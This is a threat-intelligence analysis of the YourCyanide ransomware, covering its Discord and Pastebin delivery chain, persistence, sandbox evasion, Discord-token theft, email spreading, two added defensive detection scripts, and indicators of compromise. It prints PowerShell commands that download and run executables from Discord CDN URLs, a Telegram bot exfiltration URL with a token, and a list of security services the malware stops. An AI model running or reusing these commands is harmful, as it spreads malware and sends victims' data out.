YourCyanide: An Investigation into ‘The Frankenstein’ Ransomware that Sends Malware Laced Love Letters

Authors: Anandeshwar Unnikrishnan, Rishika Desai, Benila Susan Jacob

Executive Summary

CloudSEK’s contextual AI digital risk monitoring platform XVigil came across the CMD-based ransomware strain YourCyanide being used in the wild. YourCyanide uses Discord, Microsoft Office and Pastebin as part of its payload download mechanism, delivering payloads as Discord attachments and fetching further stages through URL requests.

An analysis of the ransomware’s impact reveals that it can be used to compromise confidential business details, practices and IP. There is also a potential risk of takeover or shutdown of company operations, resulting in loss of revenue and reputation.

The mitigation measures consist of auditing and monitoring event and incident logs to identify unusual patterns and behaviour. There has to be a systematic mechanism for enforcing data protection, backup and recovery. Additionally, security configurations on network infrastructure devices such as firewalls and routers have to be implemented.

Analysis and Attribution of YourCyanide

CloudSEK’s Threat Research team has conducted an investigation into the new and sophisticated ‘YourCyanide’ ransomware, which is being used in the wild.

This CMD-based ransomware strain is distributed primarily as a Discord attachment and makes URL requests to Microsoft Office and Pastebin. Researchers at Trend Micro discovered that the roots of YourCyanide can be traced back to the GonnaCope ransomware family, which first surfaced in April 2022.

The ransom note is dumped by the malware into “YcynNote.txt”

Features of the Malware

CloudSEK’s Threat Research team discovered the following features of YourCyanide ransomware and its operators:

  • The ransomware execution file is delivered as a Discord attachment as shown below:
Ransomware delivery: (new-object net.webclient).downloadfile("https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe", "GetToken.exe")

Ransomware delivery: (new-object net.webclient).downloadfile("https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe", "NoKeyB.exe")

  • The obfuscated YourCyanide file, once deobfuscated, fetches the executable GetToken.exe.
  • The ransomware encrypts files and renames them with a .cyn extension.
  • The .cmd file of YourCyanide module is dropped by another malicious file CaffeJuice.exe.
  • The ransom note path is C:\Users\Admin\Desktop\YcynNote.txt.
YourCyanide ransomware note

  • The threat actor shares their name, BTC wallet address, contact channel and number of files encrypted in the ransom note.
  • The ransomware group usually demands USD 500 from their victims to restore their files.

Association with APT/ Other ransomware groups

  • The available YourCyanide sample indicates that it could be a variant of the Kekpop ransomware (also known as Kekware); the ransomware drops an ‘other.txt’ file that mentions Kekpop. Our research also confirms that the same Get.exe executable is used to deliver both Kekpop and YourCyanide.
One of the files that get dropped during a YourCyanide ransomware attack

  • Another similarity that links Kekpop and YourCyanide is the ‘black.bat’ file that is dropped in both instances.

Technical Analysis of the YourCyanide Ransomware

Initial Execution

Flowchart of the attack

A malicious LNK file “powershell.exe.lnk” executes a PowerShell command that retrieves the executable “YourCyanide.exe” from the Discord CDN and runs it on the victim system to launch the YourCyanide ransomware.

Powershell.exe image

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')"; start YourCyanide.exe

Delivery Mechanism – Dropper

The malicious binary YourCyanide.exe, downloaded by the LNK file, acts as a ransomware dropper. It performs the following operations on the system:

  • YourCyanide.exe creates a new directory “IXP000.TMP” in the user’s Temp directory.
  • It dumps YourCyanide.cmd into the newly created directory. The contents of the file are shown in the following image.
  • The dropper executes the batch script, which fetches content from Pastebin and saves it as YourCyanide.cmd; this is the actual ransomware, written as a batch script.
Contents of the file

  • Before exiting, the dropper deletes the dropped file and the directory in Temp.

Persistence

  • The main ransomware code fetched from Pastebin is heavily obfuscated with multiple layers of string substitution and slicing to hinder analysis and detection.
Ransomware code

  • A further analysis of the deobfuscated code shows that the batch program sets its system and hidden attributes as shown below:
Image of the batch program

  • The hidden attribute, when set, hides the file from the user, while the system attribute makes the operating system treat the file as crucial. Thus, in the event of alteration or deletion, such files are protected in the same way as system files.
  • The malware achieves persistence through the following AutoStart Extensibility Points:
    • Run Registry Key
    • Startup Folder

Encryption Process

  • The malware creates a new value “rundll32_474_toolbar” under the Run key in the registry and sets the name of the malicious batch file as the data of the new entry. A copy of the malware is then saved in the Startup folder. Once persistence is established, it creates a new batch file “AuToexEc.BAT” in the root of the C:\ drive.
  • The BAT file contains the command to start a new process from the same malware copy. Task Manager is then disabled through the registry. All of these operations are shown in the image below.
Task manager disabled

  • The malware also checks for the existence of AUTOEXEC.BAT on the victim system. If found, it is replaced with a copy of the malware as shown below. On older DOS systems, AUTOEXEC.BAT was used as an auto-execution mechanism after system boot.
Autoexec.bat

  • Additionally, the ransomware checks for an analysis environment by inspecting the username. The usernames it looks for are all taken from popular sandboxes on the internet. The malware exits if the current username matches any of the usernames listed in the code below.
Username matching

  • A file named “black.bat” is dropped in the user’s Documents directory. The contents are dynamically written into the dropped batch as shown below. The dropped batch file executes a black screensaver by calling the scrnsave.scr file. The execution of the file causes the user’s screen to go blank.
Black.bat
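The persistence and evasion steps described above leave a small, fixed set of host artifacts (the “rundll32_474_toolbar” Run value, the Startup-folder copy, C:\AuToexEc.BAT, the DisableTaskMgr policy value, black.bat in Documents, and “net stop” of defensive services). The following detector is an added example, not code from the report or the malware: it scores constructed Sysmon-style events against those artifacts so that a single weak signal (one Startup-folder script) does not fire on its own. The event field names and the sample events are assumptions modelled on Sysmon’s FileCreate, RegistryEvent and ProcessCreate fields.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events (not real telemetry). EventID 11 = FileCreate,
# 13 = registry value set, 1 = ProcessCreate; field names follow Sysmon's schema.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "13",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\rundll32_474_toolbar",
     "Details": r"C:\Users\alice\AppData\Local\Temp\YourCyanide.cmd"},
    {"EventID": "11",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YourCyanide.cmd"},
    {"EventID": "11", "TargetFilename": r"C:\AuToexEc.BAT"},
    {"EventID": "13",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
     "Details": "DWORD (0x00000001)"},
    {"EventID": "11", "TargetFilename": r"C:\Users\alice\Documents\black.bat"},
    {"EventID": "1", "CommandLine": 'net stop "WinDefend"'},
    {"EventID": "11", "TargetFilename": r"C:\Users\alice\Documents\report.docx"},  # benign noise
]

# (rule name, EventID, field to inspect, pattern). Patterns are case-insensitive
# because the sample mixes case freely (e.g. "AuToexEc.BAT").
RULES = [
    ("run_key_value", "13", "TargetObject",
     re.compile(r"\\CurrentVersion\\Run\\rundll32_474_toolbar$", re.I)),
    ("startup_folder_script", "11", "TargetFilename",
     re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(cmd|bat)$", re.I)),
    ("autoexec_root", "11", "TargetFilename",
     re.compile(r"^[A-Z]:\\autoexec\.bat$", re.I)),
    ("taskmgr_disabled", "13", "TargetObject",
     re.compile(r"\\Policies\\System\\DisableTaskMgr$", re.I)),
    ("black_bat_documents", "11", "TargetFilename",
     re.compile(r"\\Documents\\black\.bat$", re.I)),
    ("defender_service_stop", "1", "CommandLine",
     re.compile(r'^net\s+stop\s+"?WinDefend"?', re.I)),
]

def match_event(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules a single event satisfies."""
    hits = []
    for name, event_id, field, pattern in RULES:
        if event.get("EventID") == event_id and pattern.search(event.get(field, "")):
            # DisableTaskMgr only matters when it is actually set to 1.
            if name == "taskmgr_disabled" and not event.get("Details", "").endswith("(0x00000001)"):
                continue
            hits.append(name)
    return hits

def triage(events: List[Dict[str, str]]) -> Dict[str, int]:
    """Count rule hits across an event stream (one host's worth of telemetry)."""
    counts: Dict[str, int] = {}
    for event in events:
        for name in match_event(event):
            counts[name] = counts.get(name, 0) + 1
    return counts

def is_yourcyanide_chain(counts: Dict[str, int], minimum: int = 3) -> bool:
    """Require several distinct artifacts before calling it the full chain."""
    return len(counts) >= minimum
```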

Target Services

The malware terminates the following services on the target system:

Services Targeted
  • WinDefend
  • Wuauserv
  • Norton AntiVirus Firewall Monitor Service
  • McAfee SecurityCenter Update Manager
  • crmonsvc
  • ccSetMGR
  • Symantec Network Drivers Service
  • MpfService
  • helpsvc
  • *Symantec*
  • Symantec Core LC
  • Norton AntiVirus Auto Protect Service
  • Norton AntiVirus Server
  • McShield
  • InoRT
  • Norton AntiVirus Client
  • PC-cillin Personal Firewall
  • McAfee.com VirusScan Online Realtime Engine
  • Sophos Anti-Virus
  • eTrust Antivirus Realtime Server
  • net stop netsvcs
  • Security center
  • Automatic Updates
  • McAfee Spamkiller Server
  • Symantec SPBBCSvc
  • MonSvcNT
  • ccEvtMGR
  • Norton Unerase Protection
  • mcupdmgr.exe
  • ERSvc
  • *McAfee*
  • navapsvc
  • Norton AntiVirus Client
  • NAV Alert
  • DefWatch
  • InoTask
  • norton AntiVirus Corporate Edition
  • Trend Micro Proxy Service
  • SyGateService
  • Sophos Anti-Virus Network
  • Sygate Personal Firewall Pro
  • Spoolnt
  • Symantec Core LC
  • SAVScan
  • McAfee Personal Firewall Service
  • Ahnlab Task Scheduler
  • NProtectService
  • srservice
  • MskService
  • McAfeeAntiSpyware
  • *norton*
  • ccPwdSvc
  • Serv-U
  • Symantec AntiVirus Client
  • Nav Auto-Protect
  • eventlog
  • norton AntiVirus Auto Protect Service
  • ViRobot Professional Monitoring
  • McAfee.com McShield
  • Sygate Personal Firewall Pro
  • eTrust Antivirus Job Server
  • eTrust Antivirus RPC Server

Tasks

The malware terminates the following running processes on the system:

Running Processes Targeted
  • MSASCui.exe
  • Excel
  • Msaccess
  • Outlook
  • Fiirefox
  • Iexplore
  • ITunes
  • Safari
  • tskill WINWORD
  • LimreWire
  • Msnmsgr
  • Calc
  • Mspaint
  • Msnmsgr

Data Manipulation

After terminating various protective services and running tasks, the malware locks the data on the target system as shown below. The following directories and their subdirectories are traversed to perform the locking:

  • Desktop
  • Documents
  • Music
  • Pictures
  • Videos
  • Downloads
Locking of data on target systems

Each file is renamed to a number obtained by multiplying random numbers, and the extension “cyn” is appended. Once a file is renamed, random data is written into it.

The malware drops another batch file named “2b2crypt.cmd” to lock Minecraft related data as shown below. The logic used for locking is the same as seen before. The “.minecraft” and “.minecraft\mods” directories are targeted by the malware as shown below. After writing the contents of the batch file, it is executed to initiate locking of the data.

2b2crypt.cmd for Minecraft related data

The Logger Script

  • Using PowerShell, the malware retrieves another batch file “ycynlog.cmd” and executes it on the target system.
Ycynlog.cmd batch file executed

  • The “ycynlog.cmd” is heavily obfuscated with the same logic used for the main ransomware batch file. The batch instructions hosted on Pastebin are shown below. This malicious script acts as a user data logger and sends the data to a Telegram bot (https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538).
Image of Operations

  • The ycynlog.cmd script, just like the main ransomware script, begins execution by setting Run registry keys to achieve persistence on the target system, and also drops a copy of ycynlog.cmd in the Startup folder.
  • The logger script downloads an additional executable file hosted on Discord CDN and executes it on the system.

GetToken Binary

  • GetToken is a C#/.NET program used to steal users’ Discord tokens. The stealer contains hard-coded directory paths to Discord’s and various web browsers’ local storage, as shown in the image below.
GetToken Image

  • The tokens are identified by using Regex pattern matching as shown below. If a match is found, the stealer checks the validity of the token by calling the function TokenUtil.checkToken.
TokenUtil.checkToken operations

  • Token validity is checked by connecting to the Discord server and inspecting the server response. The token checking routine is shown below. Valid tokens are returned to the calling function.
Token checking routine
  • The stealer creates a file Tokens.txt on the victim system and dumps all valid tokens found into it. If no tokens are present, the value written into Tokens.txt is “Retard Has No tokens.” The ransomware finally sends Tokens.txt to the Telegram bot.
Image of Operations

  • The global IP address of the victim is retrieved by sending a request to https://ipv4.wtfismyip.com/text through curl and the output is stored as IP.txt.
  • The script retrieves a list of installed applications on the system and stores it in apps.txt to later send it to the Telegram bot.
  • WMI is used extensively to retrieve system-level information from the host. The following list summarizes the data enumerated by the script:
    • Username
    • IP address (local)
    • Network configuration data
    • MAC information
    • CPU data
    • Physical memory data
    • Disk information like partition details
    • Windows system information
    • Windows license information (Product Key)
  • The above data, along with the Tokens.txt generated by GetToken.exe, is sent to the Telegram bot. Additionally, the logger script steals the following Minecraft-specific user data:
Image of Operations

    • Launcher_msa_credentials.bin
    • Launcher_msa_credentials_microsoft_store.bin
    • Launcher_accounts.json
    • Launcher_accounts_microsoft_store.json
    • Launcher_product_state.json
    • launcher_profiles.json
  • Using PowerShell, the logger script downloads ForMe.txt from Google Cloud and executes it on the system.
Image of Operations

  • The ForMe.exe dumps data into ForMe.txt which is later pushed to the Telegram bot. Unfortunately, at the time of our analysis the Google Cloud link did not serve the file. Our research indicates that it could be a browser password stealer.
  • The ransomware script then drops a batch file named “fuckports.cmd.” Instructions to add custom firewall rules are written into the batch file as shown below. The following firewall rules allow inbound UDP traffic to port 2835 and outbound UDP traffic through 16981.
Fuckports.cmd batch file dropped

  • The malware adds itself to the win.ini and system.ini files. These files hold configuration used to start programs and apply other settings after a system boot. The malware also drops two batch files, “confession.bat” and “Check This Out.bat,” that serve identical purposes.
confession.bat

checkthisout.bat

  • YourCyanide is also capable of spreading via e-mail. It uses Visual Basic APIs to communicate with Microsoft Outlook and sends out a copy of itself as a mail attachment. The malware drops “loveletter.vbs” in the Documents directory for this purpose.
  • The VB script retrieves the user’s address list and sends out an email with the subject “I have a crush on you” and a message that states “read me.” The mail attachment contains a copy of the ransomware batch program.
Love letter

Ransom Collection

  • The malware drops an additional vbs file named “mail.vbs” with the same contents as mentioned above. However, it will send an email with the subject line “Check This Out.”
Check this out

  • The ransomware uses the PowerShell Out-Printer cmdlet to print multiple copies of the ransom note.
Ransom note

  • The malware also copies itself to other drives present on the system as shown below:
Copying itself to other drives

  • Notably, YourCyanide changes the file association of vbs, sln, js, css, and ini files. When such a file is opened, the system hands control to the associated program; the malware associates the listed file types with itself, so it is executed whenever a file of one of these types is opened.
List of associated files

  • The malware enables Remote Desktop on the target system as shown below and starts TermService (Terminal Services), the service responsible for handling RDP-related tasks.
Terminal service

  • Finally, the malware displays the ransom note to the user and creates an autorun configuration on the available drives on the system, which leads to execution of the malware itself, as shown below.
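The logger and stealer stages described above touch a recognisable sequence of external services: the Discord CDN for executables, Pastebin raw pages for the batch stages, ipv4.wtfismyip.com for the public IP, and a Telegram bot sendDocument call for exfiltration. The following proxy-log classifier is an added example, not code from the report: it maps each URL to a stage and only flags a client that shows several distinct stages, since a lone Pastebin or Discord fetch is common benign traffic. The log format (client, method, URL, status) and all sample lines are constructed; the Telegram bot token in them is a placeholder, not the one from this campaign.

```python
import re
from typing import Dict, List, Optional

# Constructed proxy log (client_ip method url status); not real traffic.
SAMPLE_PROXY_LOG = """\
10.0.0.15 GET https://cdn.discordapp.com/attachments/111111111111111111/222222222222222222/YourCyanide.exe 200
10.0.0.15 GET https://pastebin.com/raw/AAAAAAAA 200
10.0.0.15 GET https://ipv4.wtfismyip.com/text 200
10.0.0.15 POST https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN_abcDEF/sendDocument?chat_id=-1 200
10.0.0.15 GET https://cdn.discordapp.com/attachments/111111111111111111/333333333333333333/GetToken.exe 200
10.0.0.42 GET https://cdn.discordapp.com/attachments/111111111111111111/444444444444444444/photo.png 200
10.0.0.42 GET https://www.example.com/index.html 200
"""

# Stage patterns in the order the chain appears on the page. Only executable or
# script attachments count as delivery; images from the same CDN are ignored.
STAGES = [
    ("delivery", re.compile(r"^https://cdn\.discordapp\.com/attachments/\d+/\d+/[^/?]+\.(exe|cmd|bat)$", re.I)),
    ("stage2_fetch", re.compile(r"^https://pastebin\.com/raw/", re.I)),
    ("recon_public_ip", re.compile(r"^https://ipv4\.wtfismyip\.com/text$", re.I)),
    # Telegram bot tokens have the shape bot<digits>:<token>; sendDocument is the upload method.
    ("exfil_telegram", re.compile(r"^https://api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/sendDocument", re.I)),
]

def classify_url(url: str) -> Optional[str]:
    """Return the chain stage a URL belongs to, or None for unrelated traffic."""
    for stage, pattern in STAGES:
        if pattern.search(url):
            return stage
    return None

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed log line into its four fields; skip malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    return {"client": parts[0], "method": parts[1], "url": parts[2], "status": parts[3]}

def stages_by_client(log_text: str) -> Dict[str, List[str]]:
    """Map each client to the ordered list of distinct stages it was seen in."""
    seen: Dict[str, List[str]] = {}
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        stage = classify_url(record["url"])
        if stage is None:
            continue
        stages = seen.setdefault(record["client"], [])
        if stage not in stages:
            stages.append(stage)
    return seen

def suspected_hosts(log_text: str, minimum: int = 2) -> List[str]:
    """Clients that exhibit at least `minimum` distinct stages of the chain."""
    return sorted(client for client, stages in stages_by_client(log_text).items()
                  if len(stages) >= minimum)
```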

Impact & Mitigation

Impact
  • Stolen credentials could allow access to the organization’s networks.
  • Exposed Personally Identifiable Information (PII) could be used to orchestrate social engineering schemes, phishing attacks, and even identity theft.
  • Exposed credentials could be leveraged to access users’ other accounts, owing to password reuse.
  • Exposed data could reveal business practices and intellectual property.

Mitigation
  • Use proactive threat intelligence to prevent and alert users of potential threats and to strengthen external security posture.
  • Reset compromised login credentials and implement a strong password policy for user accounts.
  • Use MFA (multi-factor authentication) across logins.
  • Check for possible workarounds and patch all vulnerable and exploitable endpoints while keeping ports open.
  • Monitor for anomalies that could be indicators of possible takeovers.

Indicators of Compromise (IoCs)

Domain
  • Pastebin
  • Wtfismyip
  • Discordapp
  • Telegram
